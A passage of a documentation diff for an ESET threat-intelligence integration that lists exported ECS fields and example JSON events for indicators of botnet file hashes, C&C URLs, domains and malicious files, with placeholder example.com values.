+| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `botnet` looks as following: + +```json +{ + "@timestamp": "2023-10-18T02:05:09.000Z", + "agent": { + "ephemeral_id": "29211d59-f061-4b27-a169-6db0193f8177", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.botnet", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-20T02:05:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:18:01.686Z", + "dataset": "ti_eset.botnet", + "ingested": "2024-03-27T14:18:13Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-18T02:05:09.000Z\",\"description\":\"Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.\",\"id\":\"indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-18T02:05:09.000Z\",\"name\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-18T02:05:09Z\",\"valid_until\":\"2023-10-20T02:05:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-botnet" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.", + "file": { + "hash": { + "md5": "373d34874d7bc89fd4cefa6272ee80bf", + "sha1": "373d34874d7bc89fd4cefa6272ee80bf", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-18T02:05:09.000Z", + "modified_at": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } +} +``` + +### C&C + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `cc` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:09.000Z", + "agent": { + "ephemeral_id": "f8b54ae9-959e-4ef4-b706-1bea093aaf7e", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.cc", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:19:06.534Z", + "dataset": "ti_eset.cc", + "ingested": "2024-03-27T14:19:18Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:09.000Z\",\"description\":\"C\\u0026C of Win32/Smokeloader.H trojan\",\"id\":\"indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:09.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:09Z\",\"valid_until\":\"2023-10-21T02:00:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-cc" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-19T02:00:09.000Z", + "modified_at": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} +``` + +### Domains + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `domains` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:28.000Z", + "agent": { + "ephemeral_id": "6f2d8296-ddcf-4634-867b-00b524eb387c", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.domains", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:28.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:20:11.664Z", + "dataset": "ti_eset.domains", + "ingested": "2024-03-27T14:20:23Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:28.000Z\",\"description\":\"Host is known to be actively distributing adware or other medium-risk software.\",\"id\":\"indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:28.000Z\",\"name\":\"example.com\",\"pattern\":\"[domain-name:value='example.com']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:28Z\",\"valid_until\":\"2023-10-21T02:00:28Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-domains" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-19T02:00:28.000Z", + "modified_at": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } +} +``` + +### Malicious files + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `files` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:38.000Z", + "agent": { + "ephemeral_id": "205a7540-b015-4c5a-9534-191e2f7c11f1", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.files", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:38.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:21:17.805Z", + "dataset": "ti_eset.files", + "ingested": "2024-03-27T14:21:29Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:38.000Z\",\"description\":\"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.\",\"id\":\"indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:38.000Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:38Z\",\"valid_until\":\"2023-10-21T02:00:38Z\"}", + 